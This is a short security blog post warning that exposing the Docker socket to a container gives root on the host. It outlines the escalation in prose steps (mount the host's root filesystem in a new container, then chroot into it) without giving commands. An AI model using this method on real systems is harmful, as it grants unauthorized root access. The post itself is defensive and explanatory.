Don't expose the Docker socket (not even to a container)
Docker primarily works as a client that communicates with a daemon
process (dockerd
). Typically that socket is a UNIX domain socket
called /var/run/docker.sock
. That daemon is highly privileged;
effectively having root access. Any process that can write to the
dockerd
socket also effectively has root access.
This is no big secret. Docker clearly documents this in a bunch of
places, including the introductory documentation. It's an excellent
reason to use Docker Machine for development purposes, even on
Linux. If your regular user can write to the dockerd
socket, then
every code execution vulnerability comes with a free privilege
escalation.
The warnings around the Docker socket typically come with a (sometimes implicit) context of being on the host to begin with. Write access to the socket as an unprivileged user on the host may mean privileged access to the host, but there seems to be some confusion about what happens when you get write access to the socket from a container.
The two most common misconceptions seem to be that it either doesn't
grant elevated privileges at all, or that it grants you privileged
access within the container (and without a way to break out). This is
false; write access to the Docker socket is root on the host,
regardless on where that write comes from. This is different from
Jerome Pettazoni's dind
, which gives you Docker-in-Docker;
we're talking about access to the host's Docker socket.
The process works like this:
- The Docker container gets a
docker
client of its own, pointed at the/var/run/docker.sock
. - The Docker container launches a new container mounting
/
on/host
. This is the host root filesystem, not the first container. - The second container chroots to
/host
, and is now effectively root on the host. (There are a few differences between this and a clean login shell; for example,/proc/self/cgroups
will still show Docker cgroups. However, the attacker has all of the permissions necessary to work around this.)
This is identical to the process you'd use to escalate from outside of a container. Write access to the Docker socket is root on the host, full stop; who's writing, or where they're writing from, doesn't matter.
Unfortunately, there are plenty of development teams unaware of this property. I recently came across one, and ended up making a screencast to unambiguously demonstrate the flaw in their setup (which involved a container with write access to the Docker socket).
This isn't new; it's been a known property of the way Docker works
ever since the (unfortunately trivially cross-site scriptable) REST
API listening on a local TCP port was replaced with the
/var/run/docker.sock
UNIX domain socket.